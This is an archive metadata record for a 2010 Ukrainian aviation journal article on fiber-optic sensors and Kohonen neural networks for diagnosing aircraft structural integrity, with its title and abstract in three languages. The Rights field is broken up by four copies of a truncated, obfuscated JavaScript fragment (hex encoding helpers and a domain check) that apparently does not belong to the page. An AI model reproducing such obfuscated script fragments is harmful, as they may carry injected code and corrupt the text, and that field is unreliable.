Record Details

Fiber-optic intelligence systems for diagnostics contraction integrity of aircrafts

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Fiber-optic intelligence systems for diagnostics contraction integrity of aircrafts
Волоконно-оптические интелектуальные системи для диагностики конструктивной целостности самолетов
ВОЛОКОННО-ОПТИЧНІ ІНТЕЛЕКТУАЛЬНІ СИСТЕМИ ДЛЯ ДІАГНОСТУВАННЯ КОНСТРУКТИВНОЇ ЦІЛІСНОСТІ ЛІТАКІВ
 
Creator Shevchuk, Dmytro O.; Національний авіаційний університет
 
Subject aircraft; fiber-optic intelligence structure; fiber-optic sensors; neuron network
воздушное судно; волоконно-оптическая интеллектуальная система; волоконно-оптические датчики; нейронные сети
волоконно-оптичні датчики; волоконно-оптичні інтелектуальні структури; нейронні мережі; повітряний корабель
 
Description  Article is devoted to the possibilities to use the fiber-optical intelligence structure for the diagnostics contraction integrity of aircrafts
 Рассмотрена возможность диагностирования целостности внешнего обвода самолета в процессе его эксплуатации, а также определение степени, места и времени возникновения типового повреждения и влияние его на аэродинамические свойства самолета. Для решения поставленной задачи предложено использовать волоконно-оптическую интеллектуальную систему, в состав которой входят механолюминесцентные датчики, встраиваемые в структуру композита и преобразовывающие энергию механического напряжения в оптический сигнал. В качестве классификатора типовых повреждений используется нейронная сеть Кохонена. Рассмотрен метод обучения нейронной сети Кохонена. Приведено математическое описание влияния типового повреждения на аэродинамику самолета.
 Розглянуто можливість діагностування цілісності зовнішнього обводу літака у процесі його експлуатації, а також визначення ступеня, місця та часу виникнення типового пошкодження і вплив його на аеродинамічні властивості літака. Для вирішення поставленого завдання запропоновано використовувати волоконо-оптичну інтелектуальну систему, до складу якої входять механолюмінісцентні датчики, що вбудовуються в структуру композита та перетворюють енергію механічної напруги в оптичний сигнал. Для класифікації типових пошкоджень використовується нейронна мережа Кохонена. Розглянуто метод навчання нейронної мережі Кохонена. Наведено математичний опис впливу типового пошкодження на аеродинаміку літака.
 
Publisher National Aviation University
 
Contributor


 
Date 2010-01-01
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/1816
10.18372/2306-1472.42.1816
 
Source Proceedings of the National Aviation University; Том 42, № 1 (2010); 78-83
Вестник Национального авиационного университета; Том 42, № 1 (2010); 78-83
Вісник Національного Авіаційного Університету; Том 42, № 1 (2010); 78-83
 
Language ru
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ